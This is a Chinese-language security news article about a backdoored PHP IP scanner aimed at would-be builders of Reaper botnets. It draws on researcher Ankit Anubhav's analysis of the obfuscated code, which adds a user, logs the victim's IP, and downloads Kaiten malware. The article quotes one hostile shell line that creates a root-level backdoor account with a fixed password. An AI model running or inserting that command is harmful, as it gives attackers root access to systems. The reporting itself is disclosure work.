借Reaper僵尸网络推广免费IP扫描器 然后在IP扫描器里面放个后门

在过去数周内，那些希望创建自己的Reaper僵尸网络的黑客们，在下载IP扫描器的过程中都有“意外收获”。

IP扫描器是一个PHP文件。数周前，在关于Reaper新闻报道出来前，该PHP文件可免费下载。Reaper是由漏洞路由器和IoT设备组成的僵尸网络。

Reaper的不同之处在于，创建者利用IP扫描器寻找漏洞系统，然后利用漏洞利用程序去发现各种漏洞，在漏洞设备上安装Reaper恶意软件。这与近期很多僵尸网络（如Mirai和Hijime）不同，它们利用Telnet和SSH暴力字典对不安全设备发起攻击。

黑客搭车Reaper僵尸网络事件 传播自己的IP扫描器

聪明的诈骗分子很快意识到，随着这个新型僵尸网络的兴起，想要成为黑客的人和脚本小子们很快就会开始寻找各种构建类似僵尸网络的工具。

因此，该攻击者（我们不想本文中提及名字）创建了一个网站。他在该网站上推广一个PHP脚本，可从本地名为poop.txt的文本文档中读取IP地址，并检查IP是否是托管在GoAhead web服务器上，然后在GoAhead-Filtered.txt文件中列出正面结果。

黑客们对该脚本很有兴趣，因为可用于识别GoAhead服务器设备，通常是IP安全摄像头。这些设备上通常存在公共漏洞利用程序，也是Reaper僵尸网络的攻击目标。

随机字符墙后的多数PHP脚本都进行了模糊处理。对此，技术知识欠缺和未留意到PHP脚本源代码的脚本小子们并不感到奇怪。青天科技（NewSky Security）发现了这一点，其首席研究人员Ankit Anubhav表示：

“这种情况下，脚本通过ROT13和base64进行多次加密，并且数据也是压缩的。”

谁曾想 IP扫描器脚本有后门 黑客秒变肉鸡

进行代码反编译后，Anubhav表示，该脚本包含很明显的后门，有经验的程序员都可以预见到大量模糊化的源代码。

这些代码包含四部分。第一部分是功能完备的IP扫描器 。第二部分运营Bash命令，在Linux服务器上添加新用户，受害者可在该服务器上执行IP扫描器脚本。第三部分是在远程服务器上登录受害者IP地址。第四部分是在执行IP扫描器的服务器上下载和执行Kaiten僵尸网络恶意软件。

一般而言，那些寻求创建自己的类似Reaper僵尸网络的“黑客小子”们，最后都沦为他人Kaiten僵尸网络的组成部分。

并且，通过使用已登录的IP地址和后门账户（用户名VM，密码Meme123），提供该脚本的攻击者还能够登录受感染的服务器.

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash VM; echo -e "Meme123\nMeme123" | passwd VM;

在接受媒体采访中，Anubhav还指出，攻击者可利用该后门收集包含其他人扫描结果的GoAhead-Filtered.txt文件，并在其他僵尸网络攻击者为了做好其他一切准备后，利用这些IP地址劫持GoAhead摄像头。

其它黑客发现后门 在Twitter喊话那个“作死者”

整个过程并不复杂，Anubhav并不是唯一发现后门的人 。其他黑客也发现了后门，并在Twitter上喊话创建者。

通过深入挖掘后门创建者所用的一些ID，我们还发现：这不是他第一次发布后门恶意软件，也不是第一次与其他黑客在线争吵 。这也许就是Anubhav能够发现黑客名义的dox文件的原因。

本文写作之时，兜售PHP脚本的网站已被叫停，但Anubhav告诉媒体称：

电脑黑客还会继续在地下黑客论坛上出售其他脚本，并会为想要建立IoT僵尸网络的人提供支持。

这也不是黑客地下市场提供的第一个后门恶意软件 。今年9月份，Zscaler发现了一个隐藏在Cobian RAT恶意软件中的后门。当时，该后门在各种地下黑客论坛上出售。